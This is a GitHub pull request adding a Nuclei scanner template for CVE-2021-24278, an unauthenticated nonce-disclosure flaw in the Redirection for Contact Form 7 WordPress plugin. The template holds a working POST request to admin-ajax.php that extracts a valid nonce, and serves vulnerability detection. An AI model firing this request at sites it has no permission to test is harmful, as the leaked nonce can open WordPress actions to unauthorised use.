### PR TITLE
Add template for CVE-2021-24278

### DIFF
--- a/cves/2021/CVE-2021-24278.yaml
+++ b/cves/2021/CVE-2021-24278.yaml
@@ -4,6 +4,7 @@ info:
   name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
   author: 2rs3c
   severity: high
+  description: In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278
     - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
@@ -13,7 +14,6 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-24278
-  description: "In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function."
 
 requests:
   - method: POST
@@ -25,7 +25,6 @@ requests:
 
     body: "action=wpcf7r_get_nonce&param=wp_rest"
 
-    stop-at-first-match: true
     matchers-condition: and
     matchers:
 
@@ -33,15 +32,15 @@ requests:
         status:
           - 200
 
-      - type: word
-        condition: and
-        words:
-          - '"success":true'
+      - type: regex
         part: body
+        regex:
+          - '"success":true'
+          - '"nonce":"[a-f0-9]+"'
+        condition: and
 
     extractors:
       - type: regex
         part: body
         regex:
           - '"nonce":"[a-f0-9]+"'
-

--- a/cves/2021/CVE-2021-24278.yaml
+++ b/cves/2021/CVE-2021-24278.yaml
@@ -1,0 +1,47 @@
+id: CVE-2021-24278
+
+info:
+  name: Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
+  author: 2rs3c
+  severity: high
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278
+    - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
+    - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/
+  tags: cve,cve2021,wordpress,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-24278
+  description: "In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function."
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    body: "action=wpcf7r_get_nonce&param=wp_rest"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        condition: and
+        words:
+          - '"success":true'
+        part: body
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - '"nonce":"[a-f0-9]+"'
+


### PR DESCRIPTION
### Template / PR Information

Add template for CVE-2021-24278 (WordPress plugin high severity CVE).

Based on a POC from: https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

![image](https://user-images.githubusercontent.com/9288082/143661179-608dddd1-10a4-41be-a891-fcfba01fc1cc.png)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)